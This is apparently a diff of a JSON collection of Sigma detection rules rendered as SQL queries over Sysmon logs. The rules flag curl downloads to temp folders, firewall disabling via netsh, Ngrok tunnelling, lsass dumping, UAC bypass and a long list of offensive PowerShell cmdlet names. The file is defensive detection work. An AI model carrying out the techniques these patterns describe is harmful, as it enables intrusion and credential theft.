'%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Firewall Disabled via Netsh.EXE", - "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "status": "test", - "description": "Detects netsh commands that turns off the Windows firewall", - "author": "Fatih Sirin", + "title": "WSL Child Process Anomaly", + "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", + "status": "experimental", + "description": "Detects uncommon or suspicious child processes spawning from a WSL process. 
This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_disable.yml" + "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "title": "IIS Native-Code Module Command Line Installation", + "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "status": "test", - 
"description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "description": "Detects suspicious IIS native-code module installations via command line", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE 
'%-name:%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Use of TTDInject.exe", + "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' 
ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "proc_creation_win_lolbin_ttdinject.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "test", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", - "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.t1489" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE 
'\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", - "status": "experimental", - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "author": "Sreeman", + "title": "Suspicious Tasklist Discovery Command", + "id": "63332011-f057-496c-ad8d-d2b6afb27f96", + "status": "test", + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "author": "frack113", "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Unknown" + "Administrator, hotline ask to user" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%tasklist%' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR OriginalFileName = 'tasklist.exe'))" ], - "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" + "filename": "proc_creation_win_tasklist_basic_execution.yml" }, { - "title": "Procdump Execution", - "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", - "status": "experimental", - "description": "Detects usage of the SysInternals Procdump utility", 
- "author": "Florian Roth (Nextron Systems)", + "title": "Domain Trust Discovery Via Dsquery", + "id": "3bad990e-4848-4a78-9530-b427d854aac0", + "status": "test", + "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", + "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Legitimate use of procdump by a developer or administrator" + "Legitimate use of the utilities by legitimate user for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_procdump.yml" + "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", - "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "title": "Use Of The SFTP.EXE Binary As A LOLBIN", + "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "status": "experimental", + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1218" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 
'%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "proc_creation_win_lolbin_sftp.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE 
'%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' 
ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine 
